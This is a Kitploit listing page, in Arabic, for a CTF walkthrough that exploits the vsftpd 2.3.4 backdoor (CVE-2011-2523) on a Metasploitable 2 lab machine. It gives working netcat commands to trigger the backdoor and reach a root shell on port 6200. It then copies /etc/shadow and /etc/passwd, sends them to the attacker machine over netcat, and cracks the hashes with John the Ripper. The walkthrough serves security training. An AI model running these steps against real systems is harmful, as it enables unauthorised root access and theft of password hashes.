Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CTF---CVE-2011-2523 — شرح خطوة بخطوة لـ CTF يستغل الباب الخلفي vsftpd 2.3.4 (CVE-2011-2523) لالتقاط وكسر /etc/shadow و /etc/passwd من Metasploitable 2. | Kitploit
أدوات/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
كسر كلمات المرورالاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

شرح خطوة بخطوة لـ CTF يستغل الباب الخلفي vsftpd 2.3.4 (CVE-2011-2523) لالتقاط وكسر /etc/shadow و /etc/passwd من Metasploitable 2.

عرض المستودع
5منذ 3 سنواتلم تتم المراجعة بعد

سيناريو استحواذ على العلم - CVE-2011-2523

استحوذ على الملفين المُفكَّكين /etc/shadow و /etc/passwd من خادم Metasploitable 2 الضعيف.

إعداد البيئة

الخطوة 1: تنزيل جهاز افتراضي وفك ضغطه

لهذه المسابقة، نشغل VMware Workstation Pro مع جهازين افتراضيين. نستخدم Kali Linux كجهاز المهاجم و Metasploitable 2 كجهاز ضعيف.

  • قم بتنزيل وتثبيت VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • قم بتنزيل واستخراج جهاز Kali Linux الافتراضي: https://www.kali.org/get-kali/
  • قم بتنزيل واستخراج جهاز Metasploitable 2 الافتراضي: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

الخطوة 2: فتح جهازي Kali Linux و Metasploitable 2 الافتراضيين في VMware من الملف المستخرج

  • اختر خيار Open a Virtual Machine في VMware Workstation وحدد ملف Kali Linux المفكوك
  • انقر بزر الماوس الأيمن على شريط التمرير واختر خيار open، ثم حدد ملف Metasploitable 2 المفكوك
  • اضغط على زر Play virtual machine في كلا الجهازين
  • عندما يُطلب منك اختيار I moved It أو I copied It، اختر I copied It

الخطوة 3: تسجيل الدخول

  • سجل الدخول إلى Kali Linux باستخدام kali كاسم المستخدم وكلمة المرور
  • سجل الدخول إلى Metasploitable باستخدام msfadmin كاسم المستخدم وكلمة المرور

الخطوة 4: تسجيل عنوان IP لجهاز Metasploitable الافتراضي

  • شغّل ip addr show وسجّل عنوان IP من قسم inet

الحل

تفصّل أبحاث وهندسة معهد ماساتشوستس للتكنولوجيا CVE-2011-2523 كضعف ونقطة تعرض شائعة حيث يحتوي vsftpd 2.3.4 الذي تم تنزيله بين 20110630 و 20110703 على باب خلفي يفتح شل على المنفذ 6200/tcp.

الخطوة 1: البحث عن المنافذ المفتوحة على جهاز Metasploitable باستخدام خدمة FTP

  • nmap <vulnerable-machine-ip-address>
  • يجب أن يظهر فحص nmap منفذاً مفتوحاً على المنفذ 21 باستخدام خدمة ftp

الخطوة 2: محاولة الاتصال عبر NetCat بالمنفذ المفتوح

  • nc <vulnerable-machine-ip-address> 21
  • اسم المستخدم هو أي سلسلة تنتهي بـ :)، أدخل user <string>:)
  • عندما يُطلب كلمة المرور، أدخل أي سلسلة pass <string>
  • ثم اخرج من الاتصال باستخدام ^C [CTRL + C]، سيتم فتح شل بصلاحيات الجذر على Metasploitable على المنفذ 6200.

الخطوة 3: الاتصال بالشل على المنفذ 6200 للجهاز الضعيف

  • nc -v <vulnerable-machine-ip-address> 6200
  • اعرض عنوان IP للاتصال الحالي باستخدام ip addr show
  • أظهر أن صلاحية الجذر قد مُنحت باستخدام whoami

الخطوة 4: نسخ الملفين /etc/shadow و /etc/passwd إلى ملف آخر

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

الخطوة 5: إرسال الملفات المنسوخة إلى جهاز Kali Linux باستخدام NetCat

  • على جهاز المهاجم، ابحث عن عنوان IP تحت قسم inet باستخدام الأمر ip addr show
  • استمع للملفات باستخدام nc -l -p 1234 > shadow.txt على جهاز المهاجم
  • في شل الجذر على Metasploitable: nc -w 3 <destination-ip> 1234 < shadow.txt
  • كرر العملية لملف passwd

الخطوة 5: تنسيق ملف shadow إلى صيغة أداة John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • لاحظ الملف باستخدام cat unshadowed-input، يجب أن يحتوي على اسم المستخدم وكلمة المرور مخزّنين

الخطوة 6: فك تشفير ملف shadow باستخدام أمر John وقائمة الكلمات

  • استخدم قائمة الكلمات rockyou.txt لتفجير التجزئات باستخدام john
  • فك ضغط ملف قائمة الكلمات على Kali Linux باستخدام sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • عندما يُطلب كلمة مرور، استخدم كلمة المرور الافتراضية للمسؤول في Kali Linux وهي kali
  • فك تجزئة كلمات المرور باستخدام john unshadowed-input --wordlist=/usr/share/wordlists/rockyou.txt
  • اعرض كلمات المرور التي تم فك تشفيرها باستخدام john --show unshadowed-input
تنزيل الأداة